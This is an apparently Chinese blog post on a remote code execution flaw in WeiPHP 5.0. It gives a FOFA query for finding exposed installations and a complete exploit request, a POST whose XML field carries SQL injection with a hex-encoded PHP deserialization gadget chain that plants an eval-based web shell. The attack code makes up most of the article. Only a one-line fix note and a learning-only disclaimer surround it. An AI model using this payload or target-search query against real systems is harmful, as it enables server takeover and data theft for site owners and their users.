WeiPHP5.0远程代码执行漏洞


前言

weiphp 是一个开源,高效,简洁的微信开发平台


声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、漏洞描述

weiphp 是一个开源,高效,简洁的微信开发平台,它是基于 oneThink 这个简单而强大的内容管理框架实现的。weiphp 的目的是最大化的简化微信开发的流程,使用开发者能把最好的精力放到微信具体业务开发,并能以最快的时间完成。把一些常规而频繁的工作交由 weiphp 来处理即可。

二、影响版本

weiphp5.0
在这里插入图片描述

三、漏洞复现

FOFA:body="/css/weiphp.css" || title="weiphp" || title="weiphp4.0"
在这里插入图片描述
漏洞链接:http://127.0.0.1/public/index.php/weixin/Notice/index?img=echo+md5(1);exit();

漏洞数据包:

POST /public/index.php/weixin/Notice/index?img=echo+md5(1);exit(); HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Length: 1340
Content-Type: application/x-www-form-urlencoded

<xml>
<product_id>aaaa</product_id>
<appid>exp</appid>
<appid>=0) union select 1,2,3,4,5,6,7,0x4f3a32373a227468696e6b5c70726f636573735c70697065735c57696e646f7773223a313a7b733a33343a22007468696e6b5c70726f636573735c70697065735c57696e646f77730066696c6573223b613a313a7b693a303b4f3a31373a227468696e6b5c6d6f64656c5c5069766f74223a323a7b733a393a22002a00617070656e64223b613a313a7b733a333a226c696e223b613a313a7b693a303b733a323a223131223b7d7d733a31373a22007468696e6b5c4d6f64656c0064617461223b613a313a7b733a333a226c696e223b4f3a31333a227468696e6b5c52657175657374223a353a7b733a373a22002a00686f6f6b223b613a323a7b733a373a2276697369626c65223b613a323a7b693a303b723a383b693a313b733a353a226973436769223b7d733a363a22617070656e64223b613a323a7b693a303b723a383b693a313b733a363a226973416a6178223b7d7d733a393a22002a0066696c746572223b613a313a7b693a303b613a323a7b693a303b4f3a32313a227468696e6b5c766965775c6472697665725c506870223a303a7b7d693a313b733a373a22646973706c6179223b7d7d733a393a22002a00736572766572223b733a313a2231223b733a393a22002a00636f6e666967223b613a313a7b733a383a227661725f616a6178223b733a333a22696d67223b7d733a363a22002a00676574223b613a313a7b733a333a22696d67223b733a33303a223c3f70687020406576616c28245f524551554553545b27696d67275d293b223b7d7d7d7d7d7d,9,10,11,12-- </appid>
<mch_id>aaa</mch_id>
<nonce_str>aaa</nonce_str>
<openid>aaa</openid>
</xml>

执行MD5加密值
在这里插入图片描述
执行phpinfo()函数指针
在这里插入图片描述

四、修复建议

请关注官网更新 :https://www.weiphp.cn/

相关推荐

最近更新

  1. TCP协议是安全的吗?

    2024-03-13 02:56:02       16 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-03-13 02:56:02       16 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-03-13 02:56:02       15 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-03-13 02:56:02       18 阅读

热门阅读

  1. Mysql数据库的优点

    2024-03-13 02:56:02       21 阅读
  2. 嵌入式36——TCP

    2024-03-13 02:56:02       18 阅读
  3. 数组的数据输入

    2024-03-13 02:56:02       19 阅读
  4. python | 类与对象

    2024-03-13 02:56:02       17 阅读
  5. 算法学习日记 1 BFS算法 宽度优先算法 简介

    2024-03-13 02:56:02       21 阅读
  6. 路由算法与路由协议

    2024-03-13 02:56:02       17 阅读
  7. C++和rust的比较

    2024-03-13 02:56:02       20 阅读
  8. Vue中Class绑定和style绑定的方式

    2024-03-13 02:56:02       20 阅读
  9. 面试如何介绍MVCC

    2024-03-13 02:56:02       20 阅读
  10. c语言函数如何调用数组元素

    2024-03-13 02:56:02       23 阅读